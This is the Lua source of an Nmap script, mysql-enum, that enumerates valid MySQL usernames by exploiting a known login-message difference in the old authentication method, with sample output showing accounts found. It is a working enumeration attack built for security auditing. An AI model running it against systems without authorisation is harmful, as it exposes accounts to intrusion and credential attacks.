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Create Folder
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local bin = require "bin" local brute = require "brute" local creds = require "creds" local mysql = require "mysql" local nmap = require "nmap" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" local openssl = stdnse.silent_require "openssl" description = [[ Performs valid user enumeration against MySQL server. Server version 5.x are succeptible to an user enumeration attack due to different messages during login when using old authentication mechanism from versions 4.x and earlier. Original bug discovered and published by Kingcope: http://seclists.org/fulldisclosure/2012/Dec/9 ]] --- -- @usage -- nmap --script=mysql-enum <target> -- -- @output -- PORT STATE SERVICE REASON -- 3306/tcp open mysql syn-ack -- | mysql-enum: -- | Accounts -- | admin:<empty> - Valid credentials -- | test:<empty> - Valid credentials -- | test_mysql:<empty> - Valid credentials -- | Statistics -- |_ Performed 11 guesses in 1 seconds, average tps: 11 -- -- @args mysql-enum.timeout socket timeout for connecting to MySQL (default 5s) author = "Aleksandar Nikolic" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"intrusive", "brute"} portrule = shortport.port_or_service(3306, "mysql") local arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) arg_timeout = (arg_timeout or 5) * 1000 Driver = { new = function(self, host, port) local o = {} setmetatable(o, self) self.__index = self o.host = host o.port = port return o end, connect = function( self ) self.socket = nmap.new_socket() local status, err = self.socket:connect(self.host, self.port) self.socket:set_timeout(arg_timeout) if(not(status)) then return false, brute.Error:new( "Couldn't connect to host: " .. err ) end return true end, login = function (self, user, pass) -- pass is actually the username we want to try local status, response = mysql.receiveGreeting(self.socket) if(not(status)) then if string.find(response,"is blocked because of many connection errors") then local err = brute.Error:new( response ) err:setAbort( true ) return false, err end return false,brute.Error:new(response) end stdnse.print_debug( "Trying %s ...", pass) local auth_string = bin.pack("H","0000018d00000000") .. pass .. bin.pack("H","00504e5f5155454d4500"); -- old authentication method local err status, err = self.socket:send(bin.pack("c",string.len(auth_string)-3) .. auth_string) --send initial auth status, response = self.socket:receive_bytes(0) if not status then return false,brute.Error:new( "Incorrect username" ) end if string.find(response,"Access denied for user") == nil then -- found it return true, brute.Account:new( pass, nil, creds.State.VALID) else return false,brute.Error:new( "Incorrect username" ) end end, disconnect = function( self ) self.socket:close() return true end } action = function( host, port ) local status, result local engine = brute.Engine:new(Driver, host, port) engine.options:setOption("passonly", true ) engine:setPasswordIterator(brute.usernames_iterator()) engine.options.script_name = SCRIPT_NAME engine.options:setTitle("Valid usernames") status, result = engine:start() return result end